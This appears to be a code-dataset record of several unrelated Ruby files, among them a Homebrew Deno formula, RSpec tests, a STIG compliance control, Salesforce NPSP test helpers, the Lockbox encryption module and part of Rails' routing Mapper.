# overwrite Chromium minimum sdk version of 10.15
ENV["FORCE_MAC_SDK_MIN"] = "10.13"
# build with llvm and link against system libc++ (no runtime dep)
ENV["CLANG_BASE_PATH"] = Formula["llvm"].prefix
ENV.remove "HOMEBREW_LIBRARY_PATHS", Formula["llvm"].opt_lib
cd "cli" do
system "cargo", "install", "-vv", "--locked", "--root", prefix, "--path", "."
end
# Install bash and zsh completion
output = Utils.popen_read("#{bin}/deno completions bash")
(bash_completion/"deno").write output
output = Utils.popen_read("#{bin}/deno completions zsh")
(zsh_completion/"_deno").write output
end
test do
(testpath/"hello.ts").write <<~EOS
console.log("hello", "deno");
EOS
assert_match "hello deno", shell_output("#{bin}/deno run hello.ts")
assert_match "console.log",
shell_output("#{bin}/deno run --allow-read=#{testpath} https://deno.land/[email protected]/examples/cat.ts " \
"#{testpath}/hello.ts")
end
end
| 35.820896 | 109 | 0.6825 |
91b25915ec5463364a3df5408858c134ea979eee | 328 | require "brilliant/ast/node"
class Brilliant::AST::CodeBlock < Brilliant::AST::Node
attr_accessor :child_nodes
def initialize(child_nodes)
self.child_nodes = child_nodes.first
end
def generate_code(mod, builder)
child_nodes.each do |child_node|
child_node.generate_code(mod, builder)
end
end
end
| 19.294118 | 54 | 0.737805 |
b94973ae97bd31777413606f87e5a1a5ee4c23e8 | 176 | class CreateStandards < ActiveRecord::Migration[5.1]
def change
create_table :standards do |t|
t.string :standard_name
t.string :identifier
end
end
end
| 19.555556 | 52 | 0.693182 |
1d48c70acc9bc32b4cdfc4769d3bdeb4a7ff5458 | 581 | category_list = {
"furniture" => {
},
"fitness" => {
},
"automotive" => {
},
"children toys" => {
},
"entertainment" => {
},
"books" => {
},
"clothes" => {
},
"sports equipment" => {
},
"other" => {
}
}
category_list.each do |name, category_hash|
p = Category.new
p.name = name
p.save
end
post_type_list = {
"request" => {
},
"give away" => {
}
}
post_type_list.each do |description, post_type_hash|
p = PostType.new
p.description = description
p.save
end | 14.525 | 52 | 0.478485 |
ed0c7bdbcff145bda71c466bf559dd1a31c5e399 | 1,127 | RSpec.describe ReplyContract do
it "must have a comment" do
actual = ReplyContract.new.call({})
expect(actual.errors.to_h[:comment]).to include "is missing"
end
it "must have a comment greater than 3 characters" do
actual = ReplyContract.new.call(comment: "123")
expect(actual.errors.to_h[:comment]).to include "must be greater than 3 characters"
end
it "is success if the comment is valid" do
valid_post = instance_double(Post, id: "valid")
allow(Post).to receive(:find_by).and_return(valid_post)
actual = ReplyContract.new.call(required_params)
expect(actual).to be_success
end
it "must have a reply_post_id" do
actual = ReplyContract.new.call({})
expect(actual.errors.to_h[:reply_post_id]).to include "is missing"
end
it "must have a post with the given id" do
actual = ReplyContract.new.call(reply_post_id: "invalid")
expect(actual.errors.to_h[:reply_post_id]).to include "must exist"
end
def required_params
{
comment: "valid",
reply_post_id: "valid",
user_id: "valid",
username: "valid_username"
}
end
end
| 25.613636 | 87 | 0.69299 |
6a0e41b54cd12305a716545680b6144d073072b2 | 760 | require 'spec_helper'
require 'omnibus/manifest_entry'
module Omnibus
describe Fetcher do
let(:source_path) { '/local/path' }
let(:project_dir) { '/project/dir' }
let(:build_dir) { '/build/dir' }
let(:manifest_entry) do
double(Software,
name: 'software',
locked_version: '31aedfs',
locked_source: { path: source_path })
end
subject { described_class.new(manifest_entry, project_dir, build_dir) }
describe "#initialize" do
it "sets the resovled_version to the locked_version" do
expect(subject.resolved_version).to eq("31aedfs")
end
it "sets the source to the locked_source" do
expect(subject.source).to eq({ path: source_path})
end
end
end
end
| 24.516129 | 75 | 0.648684 |
ed7bb597a68c2e53978c1a398d51a032a077473f | 1,405 | require 'spec_helper'
RSpec.describe MessagePolicy, type: :policy do
let(:user){ }
let(:record){ create :message }
subject{ MessagePolicy.new user, record }
context 'without a user' do
it_behaves_like 'a policy forbidding', :index, :show, :create, :update, :destroy
end
context 'with a user' do
let(:user){ create :user }
it_behaves_like 'a policy permitting', :index
it_behaves_like 'a policy forbidding', :show, :create, :update, :destroy
end
context 'with a participant' do
let(:user){ record.user }
it_behaves_like 'a policy permitting', :index, :show, :create
it_behaves_like 'a policy forbidding', :update, :destroy
end
context 'with a moderator' do
let(:user){ create :moderator, section: 'zooniverse' }
it_behaves_like 'a policy permitting', :index, :show
it_behaves_like 'a policy forbidding', :create, :update, :destroy
end
context 'with an admin' do
let(:user){ create :admin, section: 'zooniverse' }
it_behaves_like 'a policy permitting', :index, :show
it_behaves_like 'a policy forbidding', :create, :update, :destroy
end
context 'with scope' do
let!(:other_records){ create_list :message, 2 }
let(:user){ create :user }
let(:records){ create_list :message, 2, user: user }
subject{ MessagePolicy::Scope.new(user, Message).resolve }
it{ is_expected.to match_array records }
end
end
| 31.222222 | 84 | 0.688968 |
ed340919286a4231d98e3735de1bf95e0e9f8777 | 163 | require "test_helper"
class UserTest < ActiveSupport::TestCase
test "random_password" do
pw = User.random_password(10).length
assert pw == 10
end
end
| 18.111111 | 40 | 0.723926 |
e8f47b30b78eecfce630eb5b11d0b8c9626607f0 | 1,648 | # -*- encoding: utf-8 -*-
# stub: sprockets-rails 2.3.3 ruby lib
Gem::Specification.new do |s|
s.name = "sprockets-rails".freeze
s.version = "2.3.3"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Joshua Peek".freeze]
s.date = "2015-09-08"
s.email = "[email protected]".freeze
s.homepage = "https://github.com/rails/sprockets-rails".freeze
s.licenses = ["MIT".freeze]
s.rubygems_version = "3.1.2".freeze
s.summary = "Sprockets Rails integration".freeze
s.installed_by_version = "3.1.2" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<sprockets>.freeze, [">= 2.8", "< 4.0"])
s.add_runtime_dependency(%q<actionpack>.freeze, [">= 3.0"])
s.add_runtime_dependency(%q<activesupport>.freeze, [">= 3.0"])
s.add_development_dependency(%q<railties>.freeze, [">= 3.0"])
s.add_development_dependency(%q<rake>.freeze, [">= 0"])
s.add_development_dependency(%q<sass>.freeze, [">= 0"])
s.add_development_dependency(%q<uglifier>.freeze, [">= 0"])
else
s.add_dependency(%q<sprockets>.freeze, [">= 2.8", "< 4.0"])
s.add_dependency(%q<actionpack>.freeze, [">= 3.0"])
s.add_dependency(%q<activesupport>.freeze, [">= 3.0"])
s.add_dependency(%q<railties>.freeze, [">= 3.0"])
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<sass>.freeze, [">= 0"])
s.add_dependency(%q<uglifier>.freeze, [">= 0"])
end
end
| 39.238095 | 112 | 0.662621 |
218476f4341b0b1bccd7738b650b3980a516d0c6 | 2,173 | # frozen_string_literal: true
control 'V-75515' do
title "A file integrity tool must be installed to verify correct operation of
all security functions in the Ubuntu operating system."
desc "Without verification of the security functions, security functions may
not operate correctly and the failure may go unnoticed. Security function is
defined as the hardware, software, and/or firmware of the information system
responsible for enforcing the system security policy and supporting the
isolation of code and data on which the protection is based. Security
functionality includes, but is not limited to, establishing system accounts,
configuring access authorizations (i.e., permissions, privileges), setting
events to be audited, and setting intrusion detection parameters.
This requirement applies to Ubuntu operating systems performing security
function verification/testing and/or systems and environments that require this
functionality.
"
impact 0.5
tag "gtitle": 'SRG-OS-000445-GPOS-00199'
tag "gid": 'V-75515'
tag "rid": 'SV-90195r3_rule'
tag "stig_id": 'UBTU-16-010500'
tag "fix_id": 'F-82143r1_fix'
tag "cci": ['CCI-002696']
tag "nist": ['SI-6 a', 'Rev_4']
tag "false_negatives": nil
tag "false_positives": nil
tag "documentable": false
tag "mitigations": nil
tag "severity_override_guidance": false
tag "potential_impacts": nil
tag "third_party_tools": nil
tag "mitigation_controls": nil
tag "responsibility": nil
tag "ia_controls": nil
desc 'check', "Verify that Advanced Intrusion Detection Environment (AIDE) is
installed and verifies the correct operation of all security functions.
Check that the AIDE package is installed with the following command:
# sudo apt list aide
aide/xenial,now 0.16~a2.git20130520-3 amd64 [installed]
If AIDE is not installed, ask the System Administrator how file integrity
checks are performed on the system.
If there is no application installed to perform integrity checks, this is a
finding."
desc 'fix', "Install the AIDE package by running the following command:
# sudo apt-get install aide"
describe package('aide') do
it { should be_installed }
end
end
| 36.830508 | 79 | 0.769903 |
ed1419e677800fc151eecdd2ecc06a35fd6f76fc | 10,356 | module Sfdo_api_npsp
# NPSP will automatically create certain fields on certain objects based on required input values for those records.
# There is no way to know in advance from the API which these are, so we find them empirically and note them here
# before calling the create() method in SfdoAPI
@fields_acceptibly_nil = { 'Contact': ['Name'],
'Opportunity': ['ForecastCategory'] }
def create_account_via_api(account_name)
record_type_id = select_api "select Id from RecordType where DeveloperName = 'HH_Account'"
@account_id = create 'Account', Name: account_name, RecordTypeId: record_type_id.first.Id
end
def create_organization_account(account_name)
# record_type_id = select_api "select Id from RecordType where DeveloperName = 'HH_Account'"
record_type_id = select_api "select Id from RecordType where DeveloperName = 'Organization'"
@account_id = create 'Account', Name: account_name, RecordTypeId: record_type_id.first.Id
end
def create_contact_via_api(client_name, street = '', city = '', state = '', country = '', zip = '')
@contact_id = create 'Contact', LastName: client_name,
MailingStreet: street,
MailingCity: city,
MailingState: state,
MailingCountry: country,
MailingPostalCode: zip
@contact_name = client_name
account_object = select_api "select AccountId from Contact where Id = '#{@contact_id}'"
my_account_object = account_object.first
@account_id_for_contact = my_account_object.AccountId
@array_of_contacts << @contact_id
end
def create_two_contacts_on_account_via_api(client_name1, client_name2)
@contact_id = create 'Contact', LastName: client_name1
@contact_name = client_name1
@array_of_contact_names << client_name1
account_object = select_api "select AccountId from Contact where Id = '#{@contact_id}'"
my_account_object = account_object.first
@account_id_for_contact = my_account_object.AccountId
@array_of_contacts << @contact_id
@contact_id = create 'Contact', LastName: client_name2, AccountId: @account_id_for_contact
@contact_name = client_name2
@array_of_contact_names << client_name2
@array_of_contacts << @contact_id
end
def create_two_contacts_on_different_accounts(client_name1, client_name2)
@contact_id_first = create 'Contact', LastName: client_name1
@contact_name_first = client_name1
@array_of_contact_names << client_name1
account_object = select_api "select AccountId from Contact where Id = '#{@contact_id_first}'"
my_account_object = account_object.first
@account_id_for_first_contact = my_account_object.AccountId
@array_of_contacts << @contact_id_first
@contact_id_second = create 'Contact', LastName: client_name2
@contact_name_second = client_name2
@array_of_contact_names << client_name2
account_object = select_api "select AccountId from Contact where Id = '#{@contact_id_second}'"
my_account_object = account_object.first
@account_id_for_second_contact = my_account_object.AccountId
@array_of_contacts << @contact_id_first
end
def create_contacts_with_household_object_via_api(hh_obj, contact_name)
@hh_obj_id = create 'Household', Name: hh_obj
#@contact_id = create 'Contact', { LastName: contact_name, Household: @hh_obj_id }
@contact_id = create 'Contact', { LastName: contact_name, Household: @hh_obj_id }
@array_of_contacts << @contact_id
#@contact_id = create 'Contact', LastName: contact_name, MailingCity: 'hhmailingcity', npo02__Household__c: @hh_obj_id
@contact_id = create 'Contact', LastName: contact_name, MailingCity: 'hhmailingcity', Household: @hh_obj_id
@array_of_contacts << @contact_id
end
def populate_soft_credit(role)
api_client do
hs_id = select_api 'select Id from Households_Settings'
hs = hs_id.first
hs.npo02__Soft_Credit_Roles__c = role
@sc_id = update_api(hs)
end
end
def create_gau_via_api(gau_name)
@gau_id = create 'General_Accounting_Unit', Name: gau_name
end
def create_lead_via_api(last_name, company)
@lead_id = create 'Lead', LastName: last_name, Company: company
end
def create_opportunity_via_api(client_name, stage_name, close_date, amount, account_id, matching_gift_status = '', matching_gift_account = '')
@opportunity_id = create 'Opportunity',
Name: client_name,
StageName: stage_name,
CloseDate: close_date,
Amount: amount.to_i,
AccountId: @account_id_for_contact,
Matching_Gift_Status: matching_gift_status,
Matching_Gift_Account: matching_gift_account
@array_of_opp_ids << @opportunity_id
end
def create_relationship_via_api(contact, related_contact)
#@relationshiop_id = create 'Relationship', npe4__Contact__c: contact, npe4__RelatedContact__c: related_contact
@relationshiop_id = create 'Relationship', Contact: contact, RelatedContact: related_contact
end
def delete_account_via_api
delete_one_account(@account_id)
end
def delete_contacts_via_api
api_client do
cons = select_api 'select Id from Contact'
delete_all_contact(cons)
end
end
def delete_engagement_plan_templates
api_client do
epts = select_api 'select Id from Engagement_Plan_Template'
delete_all_Engagement_Plan_Template(epts)
end
end
def delete_gaus_via_api
api_client do
gaus = select_api 'select Id from General_Accounting_Unit'
delete_all_General_Accounting_Unit(gaus)
end
end
def delete_household_accounts
api_client do
hh_accs = select_api "select Id from Account where Type = 'Household'"
hh_accs.each do |hh_acc|
@api_client.destroy(hh_acc.sobject_type, hh_acc.Id)
end
end
end
def delete_household_objects
api_client do
hh_objs = select_api 'select Id from Household'
delete_all_Household(hh_objs)
end
end
def delete_leads
api_client do
leads = select_api 'select Id from Lead'
leads.each do |lead_id|
@api_client.destroy(lead_id.sobject_type, lead_id.Id)
end
end
end
def delete_payments
api_client do
payments = select_api 'select Id from OppPayment'
delete_all_OppPayment(payments)
end
end
def delete_non_household_accounts
api_client do
nh_accs = select_api 'select Id from Account where Type = null'
delete_all_account(nh_accs)
end
end
def delete_opportunities
api_client do
rd_opps = select_api 'select Id from Opportunity'
delete_all_opportunity(rd_opps)
end
end
def delete_recurring_donations
api_client do
rds = select_api 'select Id from Recurring_Donation'
delete_all_Recurring_Donation(rds)
end
end
def update_account_model(to_value)
api_client do
acc_id = select_api 'select Id from Contacts_And_Orgs_Settings'
acc = acc_id.first
#THIS NEEDS A CHANGE TO SFDO-API TO SEND THESE VALUES THROUGH true_field()
acc.npe01__Account_Processor__c = to_value
update_api(acc)
end
end
def reset_these_settings(these_settings_obj)
@api_client.update_api(these_settings_obj)
end
def set_url_and_object_namespace_to_npsp
# Not sure why this is required here, but $instance_url isn't being set elsewhere all times this is called
if not $instance_url and ENV['SF_INSTANCE_URL']
$instance_url = ENV['SF_INSTANCE_URL']
end
case ENV['TARGET_ORG']
when 'unmanaged'
if $instance_url.include? "my.salesforce.com"
$target_org_url = $instance_url.gsub(/https:\/\/([\w-]+)\.(\w+)\.my.salesforce.com/, 'https://\1--c.\2.visual.force.com')
else
interim_url = $instance_url.sub('https://', 'https://c.')
$target_org_url = interim_url.sub('my.salesforce.com', 'visual.force.com')
$target_org_url = interim_url.sub('salesforce.com', 'visual.force.com')
end
$object_namespace = ''
when 'gs0'
$target_org_url = $instance_url.sub('gs0.salesforce.com', 'npsp.gus.visual.force.com')
$object_namespace = 'npsp__'
else
#THE MOST COMMON CASE, MANAGED CODE IN A DEVELOPMENT ORG
# MyDomain example: https://ability-momentum-7120-dev-ed.cs70.my.salesforce.com
# becomes: https://ability-momentum-7120-dev-ed--npsp.cs70.visual.force.com
# Pod example: https://na35.salesforce.com
# becomes: https://npsp.na35.salesforce.com
if $instance_url.include? "my.salesforce.com"
$target_org_url = $instance_url.gsub(/https:\/\/([\w-]+)\.(\w+)\.my.salesforce.com/, 'https://\1--npsp.\2.visual.force.com')
else
interim_url = $instance_url.sub('https://', 'https://npsp.')
$target_org_url = interim_url.sub('my.salesforce.com', 'visual.force.com')
$target_org_url = interim_url.sub('salesforce.com', 'visual.force.com')
end
$object_namespace = 'npsp__'
end
end
def login_with_oauth
require 'faraday'
if ENV['SF_ACCESS_TOKEN'] and ENV['SF_INSTANCE_URL']
$instance_url = ENV['SF_INSTANCE_URL']
@access_token = ENV['SF_ACCESS_TOKEN']
else
conn = Faraday.new(url: ENV['SF_SERVERURL']) do |faraday|
faraday.request :url_encoded # form-encode POST params
# faraday.response :logger # log requests to STDOUT
faraday.adapter Faraday.default_adapter # make requests with Net::HTTP
end
response = conn.post '/services/oauth2/token',
grant_type: 'refresh_token',
client_id: ENV['SF_CLIENT_KEY'],
client_secret: ENV['SF_CLIENT_SECRET'],
refresh_token: ENV['SF_REFRESH_TOKEN']
response_body = JSON.parse(response.body)
@access_token = response_body['access_token']
$instance_url = response_body['instance_url']
end
@browser.goto($instance_url + '/secur/frontdoor.jsp?sid=' + @access_token)
end
end
| 39.079245 | 144 | 0.685689 |
e9be47abb294941362535706758db9cd85e88f4a | 2,697 | # stdlib
require "base64"
require "openssl"
require "securerandom"
# modules
require "lockbox/box"
require "lockbox/calculations"
require "lockbox/encryptor"
require "lockbox/key_generator"
require "lockbox/io"
require "lockbox/migrator"
require "lockbox/model"
require "lockbox/padding"
require "lockbox/utils"
require "lockbox/version"
# integrations
require "lockbox/carrier_wave_extensions" if defined?(CarrierWave)
require "lockbox/railtie" if defined?(Rails)
if defined?(ActiveSupport)
require "lockbox/log_subscriber"
Lockbox::LogSubscriber.attach_to :lockbox
ActiveSupport.on_load(:active_record) do
extend Lockbox::Model
extend Lockbox::Model::Attached
ActiveRecord::Calculations.prepend Lockbox::Calculations
end
ActiveSupport.on_load(:mongoid) do
Mongoid::Document::ClassMethods.include(Lockbox::Model)
end
end
module Lockbox
class Error < StandardError; end
class DecryptionError < Error; end
class PaddingError < Error; end
autoload :Audit, "lockbox/audit"
extend Padding
class << self
attr_accessor :default_options
attr_writer :master_key
end
self.default_options = {}
def self.master_key
@master_key ||= ENV["LOCKBOX_MASTER_KEY"]
end
def self.migrate(relation, batch_size: 1000, restart: false)
Migrator.new(relation, batch_size: batch_size).migrate(restart: restart)
end
def self.rotate(relation, batch_size: 1000, attributes:)
Migrator.new(relation, batch_size: batch_size).rotate(attributes: attributes)
end
def self.generate_key
SecureRandom.hex(32)
end
def self.generate_key_pair
require "rbnacl"
# encryption and decryption servers exchange public keys
# this produces smaller ciphertext than sealed box
alice = RbNaCl::PrivateKey.generate
bob = RbNaCl::PrivateKey.generate
# alice is sending message to bob
# use bob first in both cases to prevent keys being swappable
{
encryption_key: to_hex(bob.public_key.to_bytes + alice.to_bytes),
decryption_key: to_hex(bob.to_bytes + alice.public_key.to_bytes)
}
end
def self.attribute_key(table:, attribute:, master_key: nil, encode: true)
master_key ||= Lockbox.master_key
raise ArgumentError, "Missing master key" unless master_key
key = Lockbox::KeyGenerator.new(master_key).attribute_key(table: table, attribute: attribute)
key = to_hex(key) if encode
key
end
def self.to_hex(str)
str.unpack("H*").first
end
def self.new(**options)
Encryptor.new(**options)
end
def self.encrypts_action_text_body(**options)
ActiveSupport.on_load(:action_text_rich_text) do
ActionText::RichText.encrypts :body, **options
end
end
end
| 25.685714 | 97 | 0.742677 |
ff325afc54e38ff86a1f1f6b129c143121190eb9 | 78,063 | # frozen_string_literal: true
require "active_support/core_ext/hash/slice"
require "active_support/core_ext/enumerable"
require "active_support/core_ext/array/extract_options"
require "active_support/core_ext/regexp"
require "action_dispatch/routing/redirection"
require "action_dispatch/routing/endpoint"
module ActionDispatch
module Routing
class Mapper
URL_OPTIONS = [:protocol, :subdomain, :domain, :host, :port]
class Constraints < Routing::Endpoint #:nodoc:
attr_reader :app, :constraints
SERVE = ->(app, req) { app.serve req }
CALL = ->(app, req) { app.call req.env }
def initialize(app, constraints, strategy)
# Unwrap Constraints objects. I don't actually think it's possible
# to pass a Constraints object to this constructor, but there were
# multiple places that kept testing children of this object. I
# *think* they were just being defensive, but I have no idea.
if app.is_a?(self.class)
constraints += app.constraints
app = app.app
end
@strategy = strategy
@app, @constraints, = app, constraints
end
def dispatcher?; @strategy == SERVE; end
def matches?(req)
@constraints.all? do |constraint|
(constraint.respond_to?(:matches?) && constraint.matches?(req)) ||
(constraint.respond_to?(:call) && constraint.call(*constraint_args(constraint, req)))
end
end
def serve(req)
return [ 404, { "X-Cascade" => "pass" }, [] ] unless matches?(req)
@strategy.call @app, req
end
private
def constraint_args(constraint, request)
constraint.arity == 1 ? [request] : [request.path_parameters, request]
end
end
class Mapping #:nodoc:
ANCHOR_CHARACTERS_REGEX = %r{\A(\\A|\^)|(\\Z|\\z|\$)\Z}
OPTIONAL_FORMAT_REGEX = %r{(?:\(\.:format\)+|\.:format|/)\Z}
attr_reader :requirements, :defaults
attr_reader :to, :default_controller, :default_action
attr_reader :required_defaults, :ast
def self.build(scope, set, ast, controller, default_action, to, via, formatted, options_constraints, anchor, options)
options = scope[:options].merge(options) if scope[:options]
defaults = (scope[:defaults] || {}).dup
scope_constraints = scope[:constraints] || {}
new set, ast, defaults, controller, default_action, scope[:module], to, formatted, scope_constraints, scope[:blocks] || [], via, options_constraints, anchor, options
end
def self.check_via(via)
if via.empty?
msg = "You should not use the `match` method in your router without specifying an HTTP method.\n" \
"If you want to expose your action to both GET and POST, add `via: [:get, :post]` option.\n" \
"If you want to expose your action to GET, use `get` in the router:\n" \
" Instead of: match \"controller#action\"\n" \
" Do: get \"controller#action\""
raise ArgumentError, msg
end
via
end
def self.normalize_path(path, format)
path = Mapper.normalize_path(path)
if format == true
"#{path}.:format"
elsif optional_format?(path, format)
"#{path}(.:format)"
else
path
end
end
def self.optional_format?(path, format)
format != false && path !~ OPTIONAL_FORMAT_REGEX
end
def initialize(set, ast, defaults, controller, default_action, modyoule, to, formatted, scope_constraints, blocks, via, options_constraints, anchor, options)
@defaults = defaults
@set = set
@to = to
@default_controller = controller
@default_action = default_action
@ast = ast
@anchor = anchor
@via = via
@internal = options.delete(:internal)
path_params = ast.find_all(&:symbol?).map(&:to_sym)
options = add_wildcard_options(options, formatted, ast)
options = normalize_options!(options, path_params, modyoule)
split_options = constraints(options, path_params)
constraints = scope_constraints.merge Hash[split_options[:constraints] || []]
if options_constraints.is_a?(Hash)
@defaults = Hash[options_constraints.find_all { |key, default|
URL_OPTIONS.include?(key) && (String === default || Integer === default)
}].merge @defaults
@blocks = blocks
constraints.merge! options_constraints
else
@blocks = blocks(options_constraints)
end
requirements, conditions = split_constraints path_params, constraints
verify_regexp_requirements requirements.map(&:last).grep(Regexp)
formats = normalize_format(formatted)
@requirements = formats[:requirements].merge Hash[requirements]
@conditions = Hash[conditions]
@defaults = formats[:defaults].merge(@defaults).merge(normalize_defaults(options))
if path_params.include?(:action) && [email protected]?(:action)
@defaults[:action] ||= "index"
end
@required_defaults = (split_options[:required_defaults] || []).map(&:first)
end
def make_route(name, precedence)
route = Journey::Route.new(name,
application,
path,
conditions,
required_defaults,
defaults,
request_method,
precedence,
@internal)
route
end
def application
app(@blocks)
end
def path
build_path @ast, requirements, @anchor
end
def conditions
build_conditions @conditions, @set.request_class
end
def build_conditions(current_conditions, request_class)
conditions = current_conditions.dup
conditions.keep_if do |k, _|
request_class.public_method_defined?(k)
end
end
private :build_conditions
def request_method
@via.map { |x| Journey::Route.verb_matcher(x) }
end
private :request_method
JOINED_SEPARATORS = SEPARATORS.join # :nodoc:
def build_path(ast, requirements, anchor)
pattern = Journey::Path::Pattern.new(ast, requirements, JOINED_SEPARATORS, anchor)
# Find all the symbol nodes that are adjacent to literal nodes and alter
# the regexp so that Journey will partition them into custom routes.
ast.find_all { |node|
next unless node.cat?
if node.left.literal? && node.right.symbol?
symbol = node.right
elsif node.left.literal? && node.right.cat? && node.right.left.symbol?
symbol = node.right.left
elsif node.left.symbol? && node.right.literal?
symbol = node.left
elsif node.left.symbol? && node.right.cat? && node.right.left.literal?
symbol = node.left
else
next
end
if symbol
symbol.regexp = /(?:#{Regexp.union(symbol.regexp, '-')})+/
end
}
pattern
end
private :build_path
private
def add_wildcard_options(options, formatted, path_ast)
# Add a constraint for wildcard route to make it non-greedy and match the
# optional format part of the route by default.
if formatted != false
path_ast.grep(Journey::Nodes::Star).each_with_object({}) { |node, hash|
hash[node.name.to_sym] ||= /.+?/
}.merge options
else
options
end
end
def normalize_options!(options, path_params, modyoule)
if path_params.include?(:controller)
raise ArgumentError, ":controller segment is not allowed within a namespace block" if modyoule
# Add a default constraint for :controller path segments that matches namespaced
# controllers with default routes like :controller/:action/:id(.:format), e.g:
# GET /admin/products/show/1
# => { controller: 'admin/products', action: 'show', id: '1' }
options[:controller] ||= /.+?/
end
if to.respond_to?(:action) || to.respond_to?(:call)
options
else
to_endpoint = split_to to
controller = to_endpoint[0] || default_controller
action = to_endpoint[1] || default_action
controller = add_controller_module(controller, modyoule)
options.merge! check_controller_and_action(path_params, controller, action)
end
end
def split_constraints(path_params, constraints)
constraints.partition do |key, requirement|
path_params.include?(key) || key == :controller
end
end
def normalize_format(formatted)
case formatted
when true
{ requirements: { format: /.+/ },
defaults: {} }
when Regexp
{ requirements: { format: formatted },
defaults: { format: nil } }
when String
{ requirements: { format: Regexp.compile(formatted) },
defaults: { format: formatted } }
else
{ requirements: {}, defaults: {} }
end
end
def verify_regexp_requirements(requirements)
requirements.each do |requirement|
if ANCHOR_CHARACTERS_REGEX.match?(requirement.source)
raise ArgumentError, "Regexp anchor characters are not allowed in routing requirements: #{requirement.inspect}"
end
if requirement.multiline?
raise ArgumentError, "Regexp multiline option is not allowed in routing requirements: #{requirement.inspect}"
end
end
end
def normalize_defaults(options)
Hash[options.reject { |_, default| Regexp === default }]
end
def app(blocks)
if to.respond_to?(:action)
Routing::RouteSet::StaticDispatcher.new to
elsif to.respond_to?(:call)
Constraints.new(to, blocks, Constraints::CALL)
elsif blocks.any?
Constraints.new(dispatcher(defaults.key?(:controller)), blocks, Constraints::SERVE)
else
dispatcher(defaults.key?(:controller))
end
end
def check_controller_and_action(path_params, controller, action)
hash = check_part(:controller, controller, path_params, {}) do |part|
translate_controller(part) {
message = "'#{part}' is not a supported controller name. This can lead to potential routing problems.".dup
message << " See https://guides.rubyonrails.org/routing.html#specifying-a-controller-to-use"
raise ArgumentError, message
}
end
check_part(:action, action, path_params, hash) { |part|
part.is_a?(Regexp) ? part : part.to_s
}
end
def check_part(name, part, path_params, hash)
if part
hash[name] = yield(part)
else
unless path_params.include?(name)
message = "Missing :#{name} key on routes definition, please check your routes."
raise ArgumentError, message
end
end
hash
end
def split_to(to)
if /#/.match?(to)
to.split("#")
else
[]
end
end
def add_controller_module(controller, modyoule)
if modyoule && !controller.is_a?(Regexp)
if %r{\A/}.match?(controller)
controller[1..-1]
else
[modyoule, controller].compact.join("/")
end
else
controller
end
end
def translate_controller(controller)
return controller if Regexp === controller
return controller.to_s if controller =~ /\A[a-z_0-9][a-z_0-9\/]*\z/
yield
end
def blocks(callable_constraint)
unless callable_constraint.respond_to?(:call) || callable_constraint.respond_to?(:matches?)
raise ArgumentError, "Invalid constraint: #{callable_constraint.inspect} must respond to :call or :matches?"
end
[callable_constraint]
end
def constraints(options, path_params)
options.group_by do |key, option|
if Regexp === option
:constraints
else
if path_params.include?(key)
:path_params
else
:required_defaults
end
end
end
end
def dispatcher(raise_on_name_error)
Routing::RouteSet::Dispatcher.new raise_on_name_error
end
end
# Invokes Journey::Router::Utils.normalize_path and ensure that
# (:locale) becomes (/:locale) instead of /(:locale). Except
# for root cases, where the latter is the correct one.
def self.normalize_path(path)
path = Journey::Router::Utils.normalize_path(path)
path.gsub!(%r{/(\(+)/?}, '\1/') unless path =~ %r{^/\(+[^)]+\)$}
path
end
def self.normalize_name(name)
normalize_path(name)[1..-1].tr("/", "_")
end
module Base
# Matches a URL pattern to one or more routes.
#
# You should not use the +match+ method in your router
# without specifying an HTTP method.
#
# If you want to expose your action to both GET and POST, use:
#
# # sets :controller, :action and :id in params
# match ':controller/:action/:id', via: [:get, :post]
#
# Note that +:controller+, +:action+ and +:id+ are interpreted as URL
# query parameters and thus available through +params+ in an action.
#
# If you want to expose your action to GET, use +get+ in the router:
#
# Instead of:
#
# match ":controller/:action/:id"
#
# Do:
#
# get ":controller/:action/:id"
#
# Two of these symbols are special, +:controller+ maps to the controller
# and +:action+ to the controller's action. A pattern can also map
# wildcard segments (globs) to params:
#
# get 'songs/*category/:title', to: 'songs#show'
#
# # 'songs/rock/classic/stairway-to-heaven' sets
# # params[:category] = 'rock/classic'
# # params[:title] = 'stairway-to-heaven'
#
# To match a wildcard parameter, it must have a name assigned to it.
# Without a variable name to attach the glob parameter to, the route
# can't be parsed.
#
# When a pattern points to an internal route, the route's +:action+ and
# +:controller+ should be set in options or hash shorthand. Examples:
#
# match 'photos/:id' => 'photos#show', via: :get
# match 'photos/:id', to: 'photos#show', via: :get
# match 'photos/:id', controller: 'photos', action: 'show', via: :get
#
# A pattern can also point to a +Rack+ endpoint i.e. anything that
# responds to +call+:
#
# match 'photos/:id', to: -> (hash) { [200, {}, ["Coming soon"]] }, via: :get
# match 'photos/:id', to: PhotoRackApp, via: :get
# # Yes, controller actions are just rack endpoints
# match 'photos/:id', to: PhotosController.action(:show), via: :get
#
# Because requesting various HTTP verbs with a single action has security
# implications, you must either specify the actions in
# the via options or use one of the HttpHelpers[rdoc-ref:HttpHelpers]
# instead +match+
#
# === Options
#
# Any options not seen here are passed on as params with the URL.
#
# [:controller]
# The route's controller.
#
# [:action]
# The route's action.
#
# [:param]
# Overrides the default resource identifier +:id+ (name of the
# dynamic segment used to generate the routes).
# You can access that segment from your controller using
# <tt>params[<:param>]</tt>.
# In your router:
#
# resources :users, param: :name
#
# The +users+ resource here will have the following routes generated for it:
#
# GET /users(.:format)
# POST /users(.:format)
# GET /users/new(.:format)
# GET /users/:name/edit(.:format)
# GET /users/:name(.:format)
# PATCH/PUT /users/:name(.:format)
# DELETE /users/:name(.:format)
#
# You can override <tt>ActiveRecord::Base#to_param</tt> of a related
# model to construct a URL:
#
# class User < ActiveRecord::Base
# def to_param
# name
# end
# end
#
# user = User.find_by(name: 'Phusion')
# user_path(user) # => "/users/Phusion"
#
# [:path]
# The path prefix for the routes.
#
# [:module]
# The namespace for :controller.
#
# match 'path', to: 'c#a', module: 'sekret', controller: 'posts', via: :get
# # => Sekret::PostsController
#
# See <tt>Scoping#namespace</tt> for its scope equivalent.
#
# [:as]
# The name used to generate routing helpers.
#
# [:via]
# Allowed HTTP verb(s) for route.
#
# match 'path', to: 'c#a', via: :get
# match 'path', to: 'c#a', via: [:get, :post]
# match 'path', to: 'c#a', via: :all
#
# [:to]
